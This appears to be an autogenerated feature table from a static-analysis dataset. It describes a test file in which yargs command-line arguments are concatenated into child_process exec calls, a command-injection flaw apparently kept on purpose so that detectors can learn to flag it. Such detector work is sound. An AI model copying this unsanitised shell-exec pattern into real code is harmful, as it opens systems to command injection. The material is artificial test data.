contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | cp.exec ... t1rest) | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | cp.exec ... t1rest) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | cp.exec ... t1rest) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | exceptional return of cp.exec ... t1rest) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | exceptional return of cp.exec ... t1rest) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | exceptional return of cp.exec ... t1rest) | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | exceptional return of cp.exec ... t1rest) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | exceptional return of cp.exec ... t1rest) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:5:65:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:5:65:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:5:65:8 | exec | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:5:65:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:5:65:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:18 | "cmd.sh " | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- taint1rest | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:22:65:31 | taint1rest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:22:65:31 | taint1rest | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:22:65:31 | taint1rest | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:22:65:31 | taint1rest | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:22:65:31 | taint1rest | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:22:65:31 | taint1rest | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:3 | cp | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:8 | cp.exec | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | cp.exec ... t2rest) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | cp.exec ... t2rest) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | cp.exec ... t2rest) | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | cp.exec ... t2rest) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | cp.exec ... t2rest) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | exceptional return of cp.exec ... t2rest) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | exceptional return of cp.exec ... t2rest) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | exceptional return of cp.exec ... t2rest) | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | exceptional return of cp.exec ... t2rest) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | exceptional return of cp.exec ... t2rest) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:5:66:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:5:66:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:5:66:8 | exec | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:5:66:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:5:66:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:18 | "cmd.sh " | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- taint2rest | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:22:66:31 | taint2rest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:22:66:31 | taint2rest | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:22:66:31 | taint2rest | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:22:66:31 | taint2rest | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:22:66:31 | taint2rest | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:22:66:31 | taint2rest | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:16 | {...taint3} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:16 | {...taint3} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:16 | {...taint3} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:16 | {...taint3} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:16 | {...taint3} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:40 | taint3 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:40 | taint3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:40 | taint3 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:40 | taint3 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:40 | taint3 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:40 | {...tai ... ').argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:40 | {...tai ... ').argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:40 | {...tai ... ').argv | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:40 | {...tai ... ').argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:6:68:40 | {...tai ... ').argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:10:68:15 | ...taint3 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:10:68:15 | ...taint3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:10:68:15 | ...taint3 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:10:68:15 | ...taint3 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:10:68:15 | ...taint3 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:10:68:15 | taint3 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:10:68:15 | taint3 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:10:68:15 | taint3 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:10:68:15 | taint3 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:10:68:15 | taint3 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:26 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:26 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:26 | require | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:26 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:26 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | exceptional return of require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | exceptional return of require('yargs') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | exceptional return of require('yargs') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | exceptional return of require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | exceptional return of require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | require('yargs') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | require('yargs') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| 